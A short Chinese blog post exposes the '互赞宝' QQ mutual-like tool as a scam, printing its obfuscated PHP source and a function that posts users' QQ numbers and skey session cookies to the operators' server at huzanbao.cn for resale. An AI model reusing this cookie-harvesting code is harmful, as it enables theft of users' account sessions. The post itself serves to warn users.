互赞宝引流骗局
网上前段时间非常流行的互赞宝,其实就是一个完整的骗局
使用之前会让用户扫描一个二维码进行登录授权,会盗取用户QQ的cookie,进行用户之间的相互互赞,当然用途还不仅仅如此!
我们看一下源代码
function get_mpzs($AA_____A,$AA____A_,$AA____AA,$AA___A__,$AA___A_A=1)
{
$EfxF0=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},$GLOBALS[AA___AA_]{0x1}));
unset($EfxtIL2);
$EfxtIL2=$EfxF0;
$A_AAAAA_=$EfxtIL2;
unset($EfxV1);
if(is_array($GLOBALS[AA___AA_]))goto EfxeWjgxtx;
goto EfxldMhxtx;
EfxeWjgxtx:$EfxV1=&$GLOBALS[AA___AA_][02];
goto Efxxtw;
EfxldMhxtx:$EfxV1=$GLOBALS[AA___AA_][02];
Efxxtw:$EfxF0=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},&$EfxV1));
$EfxL2=$EfxF0 . $AA_____A;
$EfxF2=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},$GLOBALS[AA___AA_]{3}));
$EfxL3=$EfxL2 . $EfxF2;$EfxL4=$EfxL3 . $AA____A_;unset($EfxV4);
if(is_array($GLOBALS[AA___AA_]))goto EfxeWjgxtv;
goto EfxldMhxtv;
EfxeWjgxtv:$EfxV4=&$GLOBALS[AA___AA_][4];
goto Efxxtu;
EfxldMhxtv:$EfxV4=$GLOBALS[AA___AA_][4];
Efxxtu:$EfxF3=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},&$EfxV4));
$EfxL5=$EfxL4 . $EfxF3;$EfxL6=$EfxL5 . $AA___A__;
$EfxF5=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},$GLOBALS[AA___AA_]{5}));
$EfxL7=$EfxL6 . $EfxF5;
$EfxL8=$EfxL7 . $AA___A_A;
unset($EfxtIL9);
$EfxtIL9=$EfxL8;
$A_AAAAAA=$EfxtIL9;
$EfxF0=call_user_func_array("get_curl",array(&$A_AAAAA_,&$A_AAAAAA));
unset($EfxtIL2);
$EfxtIL2=$EfxF0;
$AA______=$EfxtIL2;
if($AA______)goto EfxeWjgxuz;
goto EfxldMhxuz;
EfxeWjgxuz:return $AA______;
goto Efxxty;
EfxldMhxuz:$EfxF0=call_user_func_array("pack",array($GLOBALS[AA___AA_]{00},$GLOBALS[AA___AA_]{6}));
return $EfxF0;Efxxty:
}
function get_mpzss($uin,$skey,$superkey,$uin2,$count){
$url = "http://www.nb.huzanbao.cn:88/api.php?act=getmpz";
$data = "uin=".$uin."&skey=".$skey."&qq=".$uin2."&count=".$count;
$res = get_curl($url,$data);
return $res;
}
很明显,从41行这里就可以看得很清楚了
他们收集所有使用过用户的cookie会发送他们服务器,他们将这些卖给卡盟社区和一些广告非法商家进行二次牟利 真是打得一手好牌,挣着卖授权的钱,又挣着出售用户cookie利润的钱,就像传销一样,授权给用户拿着程序引流,又有更多的cookie流量.